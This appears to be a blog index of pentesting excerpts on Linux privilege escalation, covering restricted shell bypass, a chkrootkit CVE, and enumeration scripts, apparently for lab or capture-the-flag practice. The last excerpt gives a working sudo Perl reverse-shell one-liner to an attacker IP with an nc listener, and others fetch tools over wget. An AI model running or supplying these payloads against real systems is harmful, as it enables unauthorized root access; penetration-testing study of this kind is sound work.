Linux Restricted Shell Bypass

Restricted shells are conceptually shells with restricted permissions, with features and commands working under a very peculiar environment, built to keep users in a secure and controlled environment, allowing them just the minimum necessary to perform their daily operations. Once hackers get a low privileged shell, even a restricted one, Read more…

Chkrootkit 0.49 – Local Privilege Escalation – CVE-2014-0476

chkrootkit is a tool to locally check for signs of a rootkit (http://www.chkrootkit.org/). It contains: chkrootkit: a shell script that checks system binaries for rootkit modification. ifpromisc.c: checks if the network interface is in promiscuous mode. chklastlog.c: checks for lastlog deletions. chkwtmp.c: checks for wtmp deletions. check_wtmpx.c: checks for wtmpx Read more…

laravel – schedule task – crontab

Laravel is a web application framework with expressive, elegant syntax. https://www.easylaravelbook.com/blog/introducing-the-laravel-5-command-scheduler/ https://laravel.com/docs/5.8/scheduling#scheduling-artisan-commands The Laravel command scheduler allows you to manage your task execution dates and times using easily understandable PHP syntax. You’ll manage the task execution definitions in app/Console/Kernel.php Scheduling Your Command As was perhaps made obvious by the earlier Read more…

linux-exploit-suggester – Enumeration Linux kernelLinux-based machine

LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine. https://github.com/mzet-/linux-exploit-suggester Execute 1. Download the tool git clone https://github.com/mzet-/linux-exploit-suggester.git cd ls 2. Start python web server python -m SimpleHTTPServer 9999 3. Download the script into the server wget http://10.10.14.16:9999/linux-exploit-suggester chmod a+x linux-exploit-suggester ./ linux-exploit-suggester For Read more…

Linux config enumeration – linuxprivchecker

This script is intended to be executed locally on a Linux box to enumerate basic system info and search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text passwords and applicable exploits. https://github.com/sleventyeleven/linuxprivchecker Execution 1. Download the script into Parrot/Kali machines git clone https://github.com/sleventyeleven/linuxprivchecker.git cd linuxprivchecker ls Read more…

Linux config enumeration – unix-privesc-checkLinux

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2).  It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps http://pentestmonkey.net/tools/audit/unix-privesc-check https://github.com/pentestmonkey/unix-privesc-check Execute 1. Download the file into Kali/Parrot Read more…

Perl – privilege escalation

Using Pearl to elevate privileges using a reverse shell. Exploit 1. Check sudo permissions sudo -l 2. Start a listener on Kali/Parrot nc -lvnp 4445 3. run perl using sudo as no password is required. sudo /usr/bin/perl -e ‘use Socket;$i=”10.10.14.16″;$p=4445;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ 4. Check on the listener whoami